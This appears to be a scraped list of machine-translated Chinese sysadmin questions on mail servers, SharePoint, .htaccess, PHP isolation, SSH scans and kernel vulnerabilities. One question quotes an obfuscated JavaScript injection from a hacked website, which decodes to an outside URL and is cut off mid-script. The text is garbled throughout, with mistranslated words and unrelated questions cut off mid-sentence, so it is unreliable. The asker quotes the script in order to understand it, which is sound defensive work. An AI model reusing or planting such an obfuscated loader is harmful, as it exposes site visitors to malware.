如主题中所述,我想安装dovecot imapserver,并通过roundcube-client启用Web访问。 为了提高从不安全的机器login时的安全性,我想通过一次性密码(例如OPIE)login。 这可能吗? 有没有人有经验实现这样的function到一个networking邮件客户端?
我可以阻止服务器上的zipfile upload(godaddy linux共享主机)? 实际上,我必须提供ftp访问我的员工,不希望他们上传zip或rar files.Can我阻止这种上传? 员工使用代理访问networking,我想到的软件/浏览器插件选项,以允许FTP访问。 关于sd
所有,我们正在Sharepoint中创build一个共享的秘密库。 基本上这个想法是,一个用户填写一个“共享秘密”信息表格(又名什么是你的高中吉祥物),然后这个表格被发送到一个安全的图书馆,只有服务台才能阅读。 目前,它看起来像我们的SharePointpipe理员不知道如何创build一个安全的库。 有没有人做过类似的共享点? 还是有人知道一些很好的教程来创build这样的东西?
在我的.htaccess文件中,我正在使用RewriteCond来匹配坏机器人的用户代理。 我知道SetEnvIf也可以用来阻止不好的机器人。 问题是,RewriteCond和SetEnvIf有什么区别? 在服务器性能方面,一个比另一个更好吗? 谢谢!
今天早上,我发现一个脚本出现在我们两个网站的多个位置。 不用说,我正在从备份恢复网站,更改我们的密码和拖网FTP日志。 我应该采取其他的行动吗? 这是脚本。 任何想法可能会做什么? <!– C/C v0870 –><script>function fY(){};xN='';fY.prototype = {k : function() {p=7854;this.eS="";pT=false;return '\u0068\u0058\u0058\u0070\u003a\u002f\u002f\u0062\u0065\u006f\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0058\u006d\u006c'.replace(/X/g, 't').replace(/HHHHHHHHHHHHHHHHHHHHHH/g, 'linkonline.com/index.h');t="t";var uY="uY";var q=27591;var o=function(){return 'o'};},c : function() {var kB='';function wC(){};this.lQ="";var a=new Date(); var uA=false;function gR(){}; var b='replace';this.iA="";var m='';var w=document;var uT='';var bD="";var v=new Array();var mQ=function(){};var j=window;function kA(){};function aO(){};var f=24513;var hJ=new Date();var vH=new Date();fU=false;var qH=new Date();this.aI='';String.prototype.pZ=function(u,g){return this[b](u, g)};var mZ="mZ";var jI='';var […]
我想在我的服务器上主持php项目,也许是asp.net prjs。 我有两个主要问题。 1)PHP文件扫描我的文件系统。 我不希望它访问/var/www/majorapp/config.xml和读取数据库或pipe理员密码。 随着其他主机项目(也在PHP中)的来源, 2)追踪或杀死占用CPU或RAM的进程。 如果一个PHP文件或项目正在做一些密集的CPU我想杀了它。 如果它也可以在产卵过程中工作,那将会很棒。 奖金:如果我可以阻止它使用networking,如访问http://some_site_user_is_ip_banned_at.com或http://myself.com/project/me/recurseMe 我正在考虑允许用户运行asp.net prjs以及我的网站使用asp.net。 我的服务器是linode虚拟主机上的apache2。 Debian lenny
我在/var/log/auth.log中看到了下面的一些尝试,其中一个可能是端口扫描尝试(尽pipe如此) Nov 18 23:50:19 server sshd[21716]: Did not receive identification string from <some IP> Nov 19 00:05:57 server sshd[24056]: Did not receive identification string from <some IP> 我怎么能阻止这样的尝试?
我想阻止每分钟有50个连接的IP地址。 我该怎么办? 我应该写一个基本的代码? 提前致谢 。
我们有一个Windows客户端/(SQL-)服务器应用程序,通常安装在客户的地方。 我们现在需要提供一个托pipe的解决scheme,而基于浏览器的解决scheme在短期内是不可行的。 我们正在考虑自己托pipe数据库,并将客户端托pipe在虚拟机中。 我们可以很容易地设置所有这些,所以我们需要: 确保客户可以轻松连接,也可以 确保我们适当地限制访问虚拟机(当然是主机) 我们已经通过互联网通过RDS访问主机和访客机器,但是我们只能访问我们自己的内部非常小的一组静态IP,当然还有2(或3)个用户对RDS的限制连接到远程服务器。 所以我非常感谢如何pipe理的想法: 安全 多用户方面。 我们希望能够在没有对虚拟化基础设施进行大量投资的情况下做到这一点 – 只有一个客户可能只有两个远程用户。 谢谢!
Linux内核受到2个远程dos 漏洞的攻击 ,所有好的pipe理员都应该升级内核。 但是,我们可以采取哪些措施(例如:禁用SCTP)来减轻此内核漏洞的影响,直到我们升级并重启所有服务器为止? 另外我们如何检查我们的内核是否真的易受攻击? 带着敬意, 拉吉